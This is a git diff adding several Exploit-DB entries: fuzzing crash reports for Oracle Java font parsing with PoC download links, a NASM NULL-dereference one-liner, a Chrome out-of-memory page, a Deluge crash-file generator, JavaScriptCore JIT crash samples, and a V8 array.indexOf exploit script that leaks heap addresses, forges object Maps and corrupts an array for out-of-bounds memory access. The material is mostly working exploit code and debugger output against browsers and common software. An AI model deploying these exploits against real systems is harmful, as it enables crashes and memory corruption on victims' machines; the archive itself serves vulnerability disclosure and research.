+  ==211051==    by 0x7B7CDCF: ???
+  [...]
+--- cut ---
+
+or with AFL's libdislocator under gdb:
+
+--- cut ---
+  Thread 2 "java" received signal SIGSEGV, Segmentation fault.
+  [----------------------------------registers-----------------------------------]
+  [...]
+  R11: 0x7fffb5d89e82 --> 0x0
+  [...]
+  EFLAGS: 0x10293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
+  [-------------------------------------code-------------------------------------]
+     0x7fffb63be972 <sc_FindExtrema4+914>:        lea    r11,[r12+r9*2]
+     0x7fffb63be976 <sc_FindExtrema4+918>:        je     0x7fffb63bea30 <sc_FindExtrema4+1104>
+     0x7fffb63be97c <sc_FindExtrema4+924>:        lea    r9d,[r8-0x1]
+  => 0x7fffb63be980 <sc_FindExtrema4+928>:        add    WORD PTR [r11],0x1
+     0x7fffb63be985 <sc_FindExtrema4+933>:        test   r9d,r9d
+     0x7fffb63be988 <sc_FindExtrema4+936>:        je     0x7fffb63bea30 <sc_FindExtrema4+1104>
+     0x7fffb63be98e <sc_FindExtrema4+942>:        add    WORD PTR [r11+0x2],0x1
+     0x7fffb63be994 <sc_FindExtrema4+948>:        cmp    r8d,0x2
+  [...]
+--- cut ---
+
+On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process:
+
+--- cut ---
+  (244c.1660): Access violation - code c0000005 (first chance)
+  First chance exceptions are reported before any exception handling.
+  This exception may be expected and handled.
+  *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Java\jre1.8.0_202\bin\server\jvm.dll - 
+  jvm+0x8598:
+  00000000`61158598 c7040801000000  mov     dword ptr [rax+rcx],1 ds:00000000`05860280=00000001
+--- cut ---
+
+In total, we have encountered crashes in the t2k!sc_FindExtrema4 function in three different locations, in two cases while adding 1 to an invalid memory location, and in one case while adding 2 to an out-of-bounds address. Attached with this report are three mutated testcases (one for each crashing code location), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46722.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/46723.txt b/exploits/multiple/dos/46723.txt
new file mode 100644
index 000000000..2f811c8ac
--- /dev/null
+++ b/exploits/multiple/dos/46723.txt
@@ -0,0 +1,115 @@
+A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
+
+--- cut ---
+  $ bin/java -cp . DisplaySfntFont test.ttf
+  Iteration (0,0)
+  #
+  # A fatal error has been detected by the Java Runtime Environment:
+  #
+  #  SIGSEGV (0xb) at pc=0x00007f7285b39824, pid=234398, tid=0x00007f7286683700
+  #
+  # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
+  # Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
+  # Problematic frame:
+  # C  [libc.so.6+0x77824]# [ timer expired, abort... ]
+  Aborted
+--- cut ---
+
+The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered with the MALLOC_CHECK_=3 environment variable:
+
+--- cut ---
+  $ MALLOC_CHECK_=3 bin/java -cp . DisplaySfntFont test.ttf
+  Iteration (0,0)
+  *** Error in `bin/java': free(): invalid pointer: 0x0000000002876320 ***
+  ======= Backtrace: =========
+  /lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f84185edbcb]
+  /lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f84185f3f96]
+  jre/8u202/lib/amd64/libfontmanager.so(+0x1d2b2)[0x7f83ddc672b2]
+  jre/8u202/lib/amd64/libfontmanager.so(+0x27ff4)[0x7f83ddc71ff4]
+  jre/8u202/lib/amd64/libfontmanager.so(+0x866f)[0x7f83ddc5266f]
+  jre/8u202/lib/amd64/libfontmanager.so(Java_sun_font_SunLayoutEngine_nativeLayout+0x230)[0x7f83ddc78990]
+  [0x7f84076306c7]
+  ======= Memory map: ========
+  00400000-00401000 r-xp 00000000 fe:01 20840680                           jre/8u202/bin/java
+  00600000-00601000 r--p 00000000 fe:01 20840680                           jre/8u202/bin/java
+  00601000-00602000 rw-p 00001000 fe:01 20840680                           jre/8u202/bin/java
+  023ba000-028d9000 rw-p 00000000 00:00 0                                  [heap]
+  3d1a00000-3fba00000 rw-p 00000000 00:00 0
+  3fba00000-670900000 ---p 00000000 00:00 0
+  670900000-685900000 rw-p 00000000 00:00 0
+  685900000-7c0000000 ---p 00000000 00:00 0
+  7c0000000-7c00c0000 rw-p 00000000 00:00 0
+  7c00c0000-800000000 ---p 00000000 00:00 0
+  [...]
+--- cut ---
+
+... under Valgrind:
+
+--- cut ---
+  $ valgrind bin/java -cp . DisplaySfntFont test.ttf
+  [...]
+  ==245623== Invalid write of size 2
+  ==245623==    at 0x40BF2750: GlyphIterator::setCurrGlyphID(unsigned short) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C0C089: SingleSubstitutionFormat1Subtable::process(LEReferenceTo<SingleSubstitutionFormat1Subtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C0C4A4: SingleSubstitutionSubtable::process(LEReferenceTo<SingleSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BF47E5: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo<LookupSubtable> const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo<LookupTable> const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C02FBA: LookupProcessor::applySingleLookup(unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BEBC9C: ContextualSubstitutionBase::applySubstitutionLookups(LookupProcessor const*, LEReferenceToArrayOf<SubstitutionLookupRecord> const&, unsigned short, GlyphIterator*, LEFontInstance const*, int, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BEE766: ChainingContextualSubstitutionFormat3Subtable::process(LETableReference const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BEE8E3: ChainingContextualSubstitutionSubtable::process(LEReferenceTo<ChainingContextualSubstitutionSubtable> const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BF475B: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo<LookupSubtable> const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo<LookupTable> const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C02EAB: LookupProcessor::process(LEGlyphStorage&, GlyphPositionAdjustments*, char, LEReferenceTo<GlyphDefinitionTableHeader> const&, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==  Address 0x3f68a55c is 4 bytes before a block of size 104 alloc'd
+  ==245623==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
+  ==245623==    by 0x40BFD4CF: LEGlyphStorage::allocateGlyphArray(int, char, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BE875A: ArabicOpenTypeLayoutEngine::characterProcessing(unsigned short const*, int, int, int, char, unsigned short*&, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C0815F: OpenTypeLayoutEngine::computeGlyphs(unsigned short const*, int, int, int, char, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BFE55D: LayoutEngine::layoutChars(unsigned short const*, int, int, int, char, float, float, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C0E91F: Java_sun_font_SunLayoutEngine_nativeLayout (in jre/8u202/lib/amd64/libfontmanager.so)
+  [...]
+--- cut ---
+
+or with AFL's libdislocator under gdb:
+
+--- cut ---
+Continuing.
+  Iteration (0,0)
+  *** [AFL] bad allocator canary on free() ***
+
+  Thread 2 "java" received signal SIGABRT, Aborted.
+  [...]
+  Stopped reason: SIGABRT
+  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
+  51      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
+  gdb$ where
+  #0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
+  #1  0x00007ffff72313fa in __GI_abort () at abort.c:89
+  #2  0x00007ffff7bd651c in free () from libdislocator/libdislocator.so
+  #3  0x00007fffb892f2b2 in LEGlyphStorage::reset() () from jre/8u202/lib/amd64/libfontmanager.so
+  #4  0x00007fffb8939ff4 in OpenTypeLayoutEngine::~OpenTypeLayoutEngine() ()
+     from jre/8u202/lib/amd64/libfontmanager.so
+  #5  0x00007fffb891a66f in ArabicOpenTypeLayoutEngine::~ArabicOpenTypeLayoutEngine() ()
+     from jre/8u202/lib/amd64/libfontmanager.so
+  #6  0x00007fffb8940990 in Java_sun_font_SunLayoutEngine_nativeLayout ()
+     from jre/8u202/lib/amd64/libfontmanager.so
+  #7  0x00007fffe5e376c7 in ?? ()
+  #8  0x0000000000000000 in ?? ()
+--- cut ---
+
+On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process:
+
+--- cut ---
+  (1184.4c60): Access violation - code c0000005 (first chance)
+  First chance exceptions are reported before any exception handling.
+  This exception may be expected and handled.
+  fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x14bf:
+  00007ffa`0d6291bf 428124810000ffff and     dword ptr [rcx+r8*4],0FFFF0000h ds:00000000`39663ffc=????????
+--- cut ---
+
+We have encountered crashes in the libfontmanager!GlyphIterator::setCurrGlyphID function while trying to write before and after a heap allocation. Attached with this report are two mutated testcases (for the buffer under- and overflow), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46723.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/46726.txt b/exploits/multiple/dos/46726.txt
new file mode 100644
index 000000000..67d419104
--- /dev/null
+++ b/exploits/multiple/dos/46726.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)
+# Date: 2018-09-05
+# Exploit Author: Fakhri Zulkifli
+# Vendor Homepage: https://www.nasm.us/
+# Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
+# Version: 2.14rc15 and earlier
+# Tested on: 2.14rc15
+# CVE : CVE-2018-16517
+
+asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file.
+
+PoC:
+1. echo "equ   push  rax" > poc
+2. nasm -f elf poc
+
+insn_is_label remains FALSE and therefore leaving result->label assigned to NULL which is then dereference in islocal().
+ 
+   [...]
+    
+    if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) {    <-- not taken
+        /* there's a label here */
+        first = false;
+        result->label = tokval.t_charptr;
+        i = stdscan(NULL, &tokval);
+        if (i == ':') {         /* skip over the optional colon */
+            i = stdscan(NULL, &tokval);
+        } else if (i == 0) {
+            nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1,
+                  "label alone on a line without a colon might be in error");
+        }
+        if (i != TOKEN_INSN || tokval.t_integer != I_EQU) {
+            /*
+             * FIXME: location.segment could be NO_SEG, in which case
+             * it is possible we should be passing 'absolute.segment'. Look into this.
+             * Work out whether that is *really* what we should be doing.
+             * Generally fix things. I think this is right as it is, but
+             * am still not certain.
+             */
+            define_label(result->label,
+                         in_absolute ? absolute.segment : location.segment,
+                         location.offset, true);
+    [...]
+
+static bool islocal(const char *l)
+{
+    if (tasm_compatible_mode) {
+        if (l[0] == '@' && l[1] == '@')
+            return true;
+    }
+    return (l[0] == '.' && l[1] != '.');  <-- boom
+}
\ No newline at end of file
diff --git a/exploits/multiple/dos/46735.html b/exploits/multiple/dos/46735.html
new file mode 100644
index 000000000..66a6f92d8
--- /dev/null
+++ b/exploits/multiple/dos/46735.html
@@ -0,0 +1,47 @@
+<!--
+# Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2019-04-20
+# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
+# Vendor Homepage: https://www.google.com/
+# Version: Google Chrome 73.0.3683.103
+# Tested on: Windows x64
+# CVE : N/A
+
+# Description:
+
+# Fatal javascript OOM in invalid table size 
+
+# https://bugs.chromium.org/p/chromium/issues/detail?id=918301
+-->
+
+
+<html>
+<head>
+<script>
+
+var arr1 = [0,1];
+
+function ObjCreate(make) {
+  this.make = make;
+}
+
+var obj1 = new ObjCreate();
+
+function main() {
+
+	arr1.reduce(f3); 
+
+	Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));
+
+}
+
+function f3() {
+
+	obj1["make"] = RegExp(Array(60000).join("CCC")); 
+}
+
+</script>
+</head>
+<body onload=main()></body>
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/dos/46837.html b/exploits/multiple/dos/46837.html
new file mode 100644
index 000000000..fe4c0599d
--- /dev/null
+++ b/exploits/multiple/dos/46837.html
@@ -0,0 +1,242 @@
+<!--
+Since commit https://chromium.googlesource.com/v8/v8.git/+/c22bb466d8934685d897708119543d099b9d2a9a turbofan supports inlining calls to array.includes and array.indexOf. The logic of the function is roughly:
+
+1. Check the set of possible Maps of the array type (with NodeProperties::InferReceiverMaps).
+2. If they are all fast arrays, find the correct CSA builtin to handle the fast path (`Callable const callable = search_variant == SearchVariant::kIndexOf ? GetCallableForArrayIndexOf(kind, isolate()) : GetCallableForArrayIncludes(kind, isolate());`).
+3. Load the array length and call the builtin. The builtin will assume that the array is a FastArray with packed (dense) elements and directly search linearly through the backing memory.
+
+The issue here is that NodeProperties::InferReceiverMaps doesn't necessarily guarantee that the object will always have the inferred Map. In case it can't prove that the objects will always have the inferred Maps it will return kUnreliableReceiverMaps:
+
+    // Walks up the {effect} chain to find a witness that provides map
+    // information about the {receiver}. Can look through potentially
+    // side effecting nodes.
+    enum InferReceiverMapsResult {
+      kNoReceiverMaps,         // No receiver maps inferred.
+      kReliableReceiverMaps,   // Receiver maps can be trusted.
+      kUnreliableReceiverMaps  // Receiver maps might have changed (side-effect),
+                                                  // but instance type is reliable.
+    };
+    static InferReceiverMapsResult InferReceiverMaps(
+        JSHeapBroker* broker, Node* receiver, Node* effect,
+        ZoneHandleSet<Map>* maps_return);
+
+In which case the caller is responsible for guarding any optimizations based on the inferred Maps (e.g. by adding MapChecks). However, in this case the calling function fails to do so. As such, if the array is changed to dictionary mode before the inlined function call, the CSA builtin will read data out-of-bounds.
+
+The following sample, found through fuzzing, triggers this case: 
+
+    function v7(v8,v11) {
+        function v14(v15,v16) { }
+        // Transition to dictionary mode in the final invocation.
+        const v17 = v11.__defineSetter__(v8, v14);
+        // Will then read OOB.
+        const v18 = v11.includes(1234);
+        return v18;
+    }
+    v7([], []);
+    v7([], []);
+    %OptimizeFunctionOnNextCall(v7);
+    v7([], []);
+
+    const v57 = v7(String(0x1000000), []);
+
+Note: the commit introducing this vulnerability does not appear to be included in the stable Chrome release yet.
+-->
+
+<script>
+var conv_ab = new ArrayBuffer(8);
+var conv_f64 = new Float64Array(conv_ab);
+var conv_u64 = new BigUint64Array(conv_ab);
+BigInt.prototype.to_float = function() {
+  conv_u64[0] = this;
+  return conv_f64[0];
+};
+BigInt.prototype.hex = function() {
+  return '0x'+this.toString(16);
+};
+Number.prototype.to_int = function() {
+  conv_f64[0] = this;
+  return conv_u64[0];
+}
+Number.prototype.hex = function() {
+  return this.to_int().hex();
+}
+
+let ab = undefined;
+
+function leak(i, smi_arr, float_arr) {
+  let high_bytes = 0;
+  smi_arr.__defineSetter__(i, ()=>{});
+  ab = new ArrayBuffer(2<<26);
+  let smi_boundary = [1, 1, 1, 1];
+  for (high_bytes = 0; high_bytes < 0xffff; high_bytes++) {
+    smi_boundary[0] = high_bytes;
+    let idx = smi_arr.indexOf(high_bytes, 20);
+    if (idx == 20) {
+      break;
+    }
+  }
+
+  float_arr.__defineSetter__(i, ()=>{});
+  let tmp = new Uint32Array(ab);
+  let float_boundary = [1.1, 1.1, 1.1, 1.1];
+
+  let start = (BigInt(high_bytes)<<32n).to_float();
+  let end = ((BigInt(high_bytes)<<32n)+0x1000000n).to_float();
+  let step = 0x1000n.to_float();
+
+  for (let j = start; j < end; j += step) {
+    float_boundary[0] = j;
+    if (float_arr.indexOf(j, 30) == 30) {
+      return [j, smi_boundary, float_boundary, tmp];
+    }
+  }
+}
+
+for (let i = 0; i < 10; i++) {
+  leak('', [1], [1.1]);
+}
+
+let res = leak('100000', [1], [1.1]);
+if (res == undefined) {
+  location.reload();
+  return;
+}
+let ab_addr = res[0].to_int();
+
+console.log(`Buf at ${ab_addr.hex()}`);
+
+let u64 = new BigUint64Array(ab);
+
+function write_map(offset, type) {
+  u64[offset/8n + 0x0n] = 0x12345n;
+  u64[offset/8n + 0x1n] = 0x190000002900a804n | (type << 32n);
+  u64[offset/8n + 0x2n] = 0x92003ffn;  // bitfield 3
+  u64[offset/8n + 0x3n] = 0x41414141n; // prototype
+  u64[offset/8n + 0x4n] = 0x41414141n; // constructor or back ptr
+  u64[offset/8n + 0x5n] = 0n;          // transistions or proto info
+  u64[offset/8n + 0x6n] = 0x41414141n; // instance descriptors
+  u64[offset/8n + 0x7n] = 0n;          // layout descriptor
+  u64[offset/8n + 0x8n] = 0x41414141n; // dependent code
+  u64[offset/8n + 0x9n] = 0n;          // prototype validity cell
+}
+
+// SPACE_SIZE = 1<<18
+// LARGE_OBJ_SIZE = (1<<17) +1
+
+const SPACE_SIZE = 1n<<19n;
+const SPACE_MASK = 0xffffffffffffffffn ^ (SPACE_SIZE-1n);
+
+let space_start_addr = (ab_addr & SPACE_MASK) + SPACE_SIZE;
+let space_start_off = space_start_addr - ab_addr;
+
+console.log(`Space start: ${space_start_addr.hex()}`);
+
+let free_mem = space_start_addr + 4096n;
+
+function page_round(addr) {
+  if ((addr & 0xfffn) == 0n) {
+    return addr;
+  }
+  return (addr + 0x1000n) & 0xfffffffffffff000n;
+}
+
+function u64_offset(addr) {
+  return (addr - ab_addr) / 8n;
+}
+
+class V8String {
+  constructor(type, data) {
+    let size = BigInt(data.length)*8n;
+    this.addr = free_mem;
+    free_mem += page_round(size);
+    this.map = free_mem;
+    free_mem += page_round(0x9n*8n);
+    this.off = u64_offset(this.addr);
+    u64[this.off] = this.map|1n;
+    for (let i = 0n; i < data.length; i++) {
+      u64[this.off + 1n + i] = data[i];
+    }
+    let map_off = u64_offset(this.map);
+    u64[map_off + 0x0n] = 0x12345n;
+    u64[map_off + 0x1n] = 0x190000002900a804n | (type << 32n);
+    u64[map_off + 0x2n] = 0x92003ffn;  // bitfield 3
+    u64[map_off + 0x3n] = 0x41414141n; // prototype
+    u64[map_off + 0x4n] = 0x41414141n; // constructor or back ptr
+    u64[map_off + 0x5n] = 0n;          // transistions or proto info
+    u64[map_off + 0x6n] = 0x41414141n; // instance descriptors
+    u64[map_off + 0x7n] = 0n;          // layout descriptor
+    u64[map_off + 0x8n] = 0x41414141n; // dependent code
+    u64[map_off + 0x9n] = 0n;          // prototype validity cell
+  }
+}
+
+class ConsString extends V8String {
+  constructor(size, left, right) {
+    super(0x29n, [(size<<32n) | 0x00000003n, left|1n, right|1n]);
+  }
+}
+
+class SliceString extends V8String {
+  constructor(parent_string, offset, len=0x100n) {
+    super(0x2bn, [(len<<32n) | 0x00000003n, parent_string|1n, offset<<32n]);
+  }
+}
+
+class SeqString extends V8String {
+  constructor(data) {
+    super(0x08n, [(BigInt(data.length*8) << 32n | 0xdf61f02en)].concat(data));
+  }
+}
+
+// object in young generation == space+8 has one of these bits set: 0x18
+u64[space_start_off/8n + 0x1n] = 0x18n;
+
+LEAK_STRING_SZ = 0x1;
+
+let seq_string = new SeqString([0x4141414141414141n]);
+let root_string = new ConsString(BigInt(LEAK_STRING_SZ), seq_string.addr, seq_string.addr);
+
+function foo(i, arr, to_search, to_copy) {
+  arr.__defineSetter__(i, ()=>{});
+  let a = [1.1, to_copy];
+  let boundary = [to_search];
+  return [arr.indexOf(to_search), a, boundary];
+}
+
+for (let i = 0; i < 100000; i++) {
+  foo('', [Array], '', 1.1);
+}
+
+function doit(to_search, to_copy) {
+  return foo('100000', [Array], to_search, to_copy)[0];
+}
+
+doit('A'.repeat(LEAK_STRING_SZ), (root_string.addr|1n).to_float());
+let corrupted_array = [1.1, 1.2, 1.3];
+
+console.log(`string at = ${u64[root_string.off+2n].hex()}`);
+
+let corrupted_array_addr = u64[root_string.off+2n]+0x40n;
+let backing_store_sz_addr = corrupted_array_addr + 0x38n;
+
+
+GC_STRING_SZ = 0x30000000;
+
+u64[space_start_off/8n + 0x0n] = 0x1234n;
+// object in young generation == space+8 has one of these bits set: 0x18
+u64[space_start_off/8n + 0x1n] = 0xff000n;
+// marking bitmap pointer
+u64[space_start_off/8n + 0x2n] = backing_store_sz_addr + 4n - (0x70n*0x4n);
+u64[space_start_off/8n + 0x6n] = space_start_addr;
+// incremental_marking ptr
+u64[space_start_off/8n + 0xf7n] = space_start_addr;
+
+seq_string = new SeqString([0x4141414141414141n]);
+root_string = new ConsString(BigInt(GC_STRING_SZ), seq_string.addr, seq_string.addr);
+doit('A'.repeat(GC_STRING_SZ), (root_string.addr|1n).to_float());
+corrupted_array[100] = 1.1;
+console.log('=== OOB array leak ===');
+for (let i = 0; i < 100; i++) {
+  console.log(corrupted_array[i].hex());
+}
+</script>
\ No newline at end of file
diff --git a/exploits/multiple/dos/46883.py b/exploits/multiple/dos/46883.py
new file mode 100755
index 000000000..140e725f3
--- /dev/null
+++ b/exploits/multiple/dos/46883.py
@@ -0,0 +1,22 @@
+#Exploit Title: Deluge 1.3.15 - 'URL' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-20
+#Vendor Homepage: https://dev.deluge-torrent.org/
+#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe
+#Tested Version: 1.3.15
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: deluge_url.py
+#2.- Open deluge_url.txt and copy content to clipboard
+#3.- Open deluge.exe
+#4.- Select "File" > "Add Torrent" > "URL"
+#5.- In "From URL" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+cod = "\x41" * 5000
+
+f = open('deluge_url.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/multiple/dos/46888.txt b/exploits/multiple/dos/46888.txt
new file mode 100644
index 000000000..8c258e137
--- /dev/null
+++ b/exploits/multiple/dos/46888.txt
@@ -0,0 +1,28 @@
+See also  https://bugs.chromium.org/p/project-zero/issues/detail?id=1699 for a similar issue.
+
+The DFG JIT compiler attempts to determine whether a DFG IR operation could cause garbage collection (GC) during its execution [1]. With this, it is then possible for the compiler to determine whether there could be a GC between point A and point B in a function, which in turn can be used to omit write barriers (see e.g. https://v8.dev/blog/concurrent-marking#reducing-marking-pause for an explanation of write barriers) [2]. For example, in case an (incremental) GC cannot happen between an allocation of an object and a property store to it, the write barrier after the property store can be omitted (because in that case the newly allocated object could not already have been marked, so must be white). However, if the analysis is incorrect and a GC can happen in between, then the emitted code can cause use-after-free issues, e.g. if an unmarked (white) object is assigned as property to an object that was marked during an unexpected GC (and is thus black).
+
+Since commit  9725889d5172a204aa1120e06be9eab117357f4b [3] "Add code to validate expected GC activity modelled by doesGC() against what the runtime encounters", JSC, in debug builds, asserts that the information computed by doesGC is correct: "In DFG::SpeculativeJIT::compile() and FTL::LowerDFGToB3::compileNode(), before emitting code / B3IR for each DFG node, we emit a write to set Heap::m_expectDoesGC to the value returned by doesGC() for that node. In the runtime (i.e. in allocateCell() and functions that can resolve a rope), we assert that Heap::m_expectDoesGC is true.". The following sample (found through fuzzing and then simplified), triggers such an assertion:
+
+    function f(a) {
+        return 0 in a;
+    }
+    for (let i = 0; i < 100000; i++) {
+        const s = new String('asdf');
+        s[42] = 'x';                   // Give it ArrayStorage
+        f(s);
+    }
+
+Here, the `in` operation is converted to a HasIndexedProperty DFG operation [4]. Since the String object has ArrayStorage (due to the additional element), DFGClobberize will report that it does not write to the heap [5]. Afterwards, doesGC reports that the operation cannot trigger GC [6]. However, during the execution of the operation (in the DFG JIT implemented by a call to operationHasIndexedPropertyByInt [7]) the code ends up in JSString::getIndex (to determine whether the index is valid in the underlying string), which can end up flattening a rope string, thus causing a heap allocation and thus potentially causing garbage collection. This is where, in debug builds, the assertion fails:
+
+    ASSERTION FAILED: vm()->heap.expectDoesGC()
+    ../../Source/JavaScriptCore/runtime/JSString.h(1023) : WTF::StringView JSC::JSString::unsafeView(JSC::ExecState *) const
+    1   0x10d67e769 WTFCrash
+    2   0x10bb6948b WTFCrashWithInfo(int, char const*, char const*, int)
+    3   0x10bba9e59 JSC::JSString::unsafeView(JSC::ExecState*) const
+    4   0x10bba9c6e JSC::JSString::getIndex(JSC::ExecState*, unsigned int)
+    5   0x10c712a24 JSC::JSString::getStringPropertySlot(JSC::ExecState*, unsigned int, JSC::PropertySlot&)
+    6   0x10d330b90 JSC::StringObject::getOwnPropertySlotByIndex(JSC::JSObject*, JSC::ExecState*, unsigned int, JSC::PropertySlot&)
+    7   0x10bbaa368 JSC::JSObject::getPropertySlot(JSC::ExecState*, unsigned int, JSC::PropertySlot&)
+    8   0x10d20d831 JSC::JSObject::hasPropertyGeneric(JSC::ExecState*, unsigned int, JSC::PropertySlot::InternalMethodType) const
+    9   0x10c70132f operationHasIndexedPropertyByInt
\ No newline at end of file
diff --git a/exploits/multiple/dos/46889.txt b/exploits/multiple/dos/46889.txt
new file mode 100644
index 000000000..74609cdd5
--- /dev/null
+++ b/exploits/multiple/dos/46889.txt
@@ -0,0 +1,158 @@
+While fuzzing JavaScriptCore, I encountered the following (modified and commented) JavaScript program which crashes jsc from current HEAD and release:
+
+    // Run with --useConcurrentJIT=false
+
+    // Fill the stack with the return value of the provided function.
+    function stackspray(f) {
+        // This function will spill all the local variables to the stack
+        // since they are needed for the returned array.
+        let v0 = f(); let v1 = f(); let v2 = f(); let v3 = f();
+        let v4 = f(); let v5 = f(); let v6 = f(); let v7 = f();
+        return [v0, v1, v2, v3, v4, v5, v6, v7];
+    }
+    // JIT compile the stack spray.
+    for (let i = 0; i < 1000; i++) {
+        // call twice in different ways to prevent inlining.
+        stackspray(() => 13.37);
+        stackspray(() => {});
+    }
+
+    for (let v15 = 0; v15 < 100; v15++) {
+        function v19(v23) {
+            // This weird loop form might be required to prevent loop unrolling...
+            for (let v30 = 0; v30 < 3; v30 = v30 + "asdf") {
+                // Generates the specific CFG necessary to trigger the bug.
+                const v33 = Error != Error;
+                if (v33) {
+                } else {
+                    // Force a bailout.
+                    // CFA will stop here and thus mark the following code as unreachable.
+                    // Then, LICM will ignore the memory writes (e.g. initialization of stack slots)
+                    // performed by the following code and will then move the memory reads (e.g.
+                    // access to stack slots) above the loop, where they will, in fact, be executed.
+                    const v34 = (1337)[-12345];
+                }
+
+                function v38(v41) {
+                    // v41 is 8 bytes of uninitialized stack memory here, as
+                    // (parts of) this code get moved before the loop as well.
+                    return v41.hax = 42;
+                }
+                for (let v50 = 0; v50 < 10000; v50++) {
+                    let o = {hax: 42};
+                    const v51 = v38(o, ...arguments);
+                }
+            }
+            // Force FTL compilation, probably.
+            for (let v53 = 0; v53 < 1000000; v53++) {
+            }
+        }
+
+        // Put controlled data onto the stack.
+        stackspray(() => 3.54484805889626e-310);        // 0x414141414141 in binary
+        // Call the miscompiled function.
+        const v55 = v19(1337);
+    }
+
+
+This yields a crash similar to the following:
+
+# lldb -- /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc --useConcurrentJIT=false current.js
+(lldb) target create "/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc"
+Current executable set to '/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc' (x86_64).
+(lldb) settings set -- target.run-args  "--useConcurrentJIT=false" "current.js"
+(lldb) r
+Process 45483 launched: '/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc' (x86_64)
+Process 45483 stopped
+* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
+    frame #0: 0x000025c3ca81306e
+->  0x25c3ca81306e: cmp    dword ptr [rax], 0x127
+    0x25c3ca813074: jne    0x25c3ca81316f
+    0x25c3ca81307a: mov    dword ptr [rbp + 0x24], 0x1
+    0x25c3ca813081: movabs rax, 0x7fff3c932a70
+Target 0: (jsc) stopped.
+(lldb) reg read rax
